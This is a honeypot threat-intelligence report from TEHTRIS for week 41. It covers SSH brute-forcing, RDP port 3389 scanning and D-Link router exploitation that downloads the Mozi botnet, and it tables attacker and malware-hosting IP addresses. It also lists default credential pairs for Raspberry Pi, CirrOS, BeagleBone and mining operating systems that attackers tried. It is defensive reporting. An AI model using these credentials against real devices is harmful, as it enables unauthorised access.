TEHTRIS observed the activity on its honeypot network during week 41. Some trends remain the same as in previous weeks. For example, the EternalBlue accounts for the overwhelming majority of the activity detected by the TEHTRIS NTA solution. Similarly, the non-standard most used port remains port 6379 (used to exploit a vulnerability on Redis instances). Finally, the IP addresses responsible for most of the malicious network activity on honeypots are recorded mainly in the Netherlands (21.76%), the United States (20%), China (12.8%) and Bulgaria (8%), as observed in the previous weeks.
In addition to these, TEHTRIS analyzed three other types of malicious behavior this week.
SSH protocol abuse: connection attempts from 9 IP addresses with similar behavior
TEHTRIS has been monitoring the SSH protocol on its honeypot network this week. It is interesting to observe similar behavior from 9 different IP addresses:
Adresse IP |
AS |
Pays |
37.245.56[.]240 |
AS 5384 EMIRATES TELECOMMUNICATIONS CORPORATION |
AE |
84.199.203[.]118 |
AS 6848 TELENET BVBA |
BE |
179.129.4[.]13 |
AS 26599 TELEFONICA BRASIL S.A |
BR |
99.249.29[.]5 |
AS 812 ROGERS-COMMUNICATIONS |
CA |
119.146.57[.]210 |
AS 4134 CHINANET |
CN |
42.4.194[.]149 |
AS 4837 CHINA UNICOM CHINA169 BACKBONE |
CN |
221.0.168[.]23 |
AS 4837 CHINA UNICOM CHINA169 BACKBONE |
CN |
83.138.45[.]80 |
AS 15704 XTRA TELECOM S.A. |
ES |
83.23.33[.]30 |
AS 5617 ORANGE POLSKA SPOLKA AKCYJNA |
PL |
These IP addresses are detected successively on the same day attempting SSH connection using the same 21 logins. They mainly target Lithuanian, Finnish, Portuguese and British infrastructures. Brasilian IP address 179.129.4[.]13 corresponds to domain name vivozap.com[.]br, publicly documented in malicious activities.
Apart from the “classic” logins (root, admin, test…), the following default logins were used:
- debian / temppwd, which are the default credentials for some versions of BeagleBone routers
- login: cirros / password: goscubsgo or cubswin:), default credentials of the Linux OS CirrOS explained in the honeypots article week 40
- login: pi / password: raspberry, default credentials for older versions of Raspberry Pi OS, a free operating system based on Debian
- ethos / live, default credentials for ethOS, an OS optimized for mining cryptocurrencies like Ethereum, Zash, Monero
- miner / mmpOS, which are the default credentials of the mmpOS mining platform
TEHTRIS would like to take this opportunity to remind you once again of this important rule of cyber hygiene: always change the default logins and passwords on any machine or software, especially those exposed on the Internet.
Attempt to compromise TCP 3389
A study of network activity using ports others than well-known ports (>1024) shows that nearly one in ten events is a TCP request on port 3389, made by more than 1100 different IP addresses.
Port 3389 is associated with the Windows Remote Desktop Protocol (RDP), allowing remote desktop access. Several vulnerabilities have been discovered on the RDP, allowing a remote code execution. These vulnerabilities have since been patched by Microsoft. However, attacks targeting Remote Desktop Systems exposed on the Internet are still very much on the agenda: the new ransomware group nicknamed Venus, active since this summer (2022), targets publicly exposed Remote Desktop services to gain access to its victims’ network.
Thus, it is strongly advised against exposing port 3389 on the internet, as it could be used as an access point for attackers who are still actively scanning these 2019 vulnerabilities. And rightly so, since there are still over 3 million 3389 ports exposed on the internet, according to the search engine Shodan.io!
Continued attempts to exploit D-Link routers
Again, this week, more than 100 attempts to exploit vulnerable D-Link routers were observed on the TEHTRIS honeypots. These requests were explained in more detail in week 38 .
The requests contain connections to 35 different malicious servers to download the malicious file Mozi.m (botnet):
Adresse IP | Port | AS | Pays |
179.43.175[.]5 | – | AS 51852 PRIVATE LAYER INC | CH |
179.43.163[.]105 | – | AS 51852 PRIVATE LAYER INC | CH |
112.28.39[.]234 | 39756 | AS 9808 CHINA MOBILE COMMUNICATIONS GROUP CO., LTD. | CN |
113.25.203[.]184 | 48048 | AS 4134 CHINANET | CN |
115.48.217[.]218 | 38272 | AS 4837 CHINA UNICOM CHINA169 BACKBONE | CN |
115.54.232[.]252 | 58935 | AS 4837 CHINA UNICOM CHINA169 BACKBONE | CN |
115.60.60[.]195 | 37077 | AS 4837 CHINA UNICOM CHINA169 BACKBONE | CN |
119.187.195[.]140 | 34387 | AS 4837 CHINA UNICOM CHINA169 BACKBONE | CN |
120.83.79[.]34 | 39639 | AS 17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE | CN |
124.42.176[.]117 | 39864 | AS 17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE | CN |
125.106.159[.]51 | 38498 | AS 4134 CHINANET | CN |
125.117.106[.]167 | 37185 | AS 4134 CHINANET | CN |
125.47.212[.]63 | 45960 | AS 4837 CHINA UNICOM CHINA169 BACKBONE | CN |
163.179.233[.]138 | 55458 | AS 17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE | CN |
221.14.111[.]125 | 49504 | AS 4837 CHINA UNICOM CHINA169 BACKBONE | CN |
27.215.70[.]186 | 56740 | AS 4837 CHINA UNICOM CHINA169 BACKBONE | CN |
42.227.237[.]130 | 52788 | AS 4837 CHINA UNICOM CHINA169 BACKBONE | CN |
58.252.164[.]133 | 56207 | AS 17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE | CN |
60.179.68[.]181 | 33989 | AS 4134 CHINANET | CN |
61.3.188[.]115 | 44589 | AS 9829 NATIONAL INTERNET BACKBONE | CN |
61.53.17[.]13 | 53424 | AS 9829 NATIONAL INTERNET BACKBONE | CN |
103.121.174[.]129 | 54040 | AS 137655 ANGEL AIR NETWORK SOLUTIONS PVT. LTD. | IN |
103.183.33[.]71 | 47628 | AS 133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED | IN |
117.201.203[.]112 | 37600 | AS 9829 NATIONAL INTERNET BACKBONE | IN |
117.215.240[.]15 | 55856 | AS 9829 NATIONAL INTERNET BACKBONE | IN |
117.216.18[.]64 | 38915 | AS 9829 NATIONAL INTERNET BACKBONE | IN |
117.221.127[.]246 | 45314 | AS 9829 NATIONAL INTERNET BACKBONE | IN |
202.164.136[.]104 | 40553 | AS 17465 CABLE ISP IN INDIA | IN |
210.89.58[.]184 | 33620 | AS 133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED | IN |
223.130.30[.]142 | 37215 | AS 133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED | IN |
223.130.30[.]166 | 53165 | AS 133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED | IN |
59.99.200[.]114 | 51145 | AS 9829 NATIONAL INTERNET BACKBONE | IN |
1.246.222[.]6 | 1473 | AS 9318 SK BROADBAND CO LTD | KR |
82.151.125[.]134 | 47150 | AS 12389 ROSTELECOM | RU |
102.33.108[.]55 | 51151 | AS 327782 METROFIBRE-NETWORX | ZA |
5 IP addresses hosted by AS4837 CHINA UNICOM are associated with the same domain name hn.kd.ny[.]adsl.
TEHTRIS recommends that you always apply updates as soon as they become available.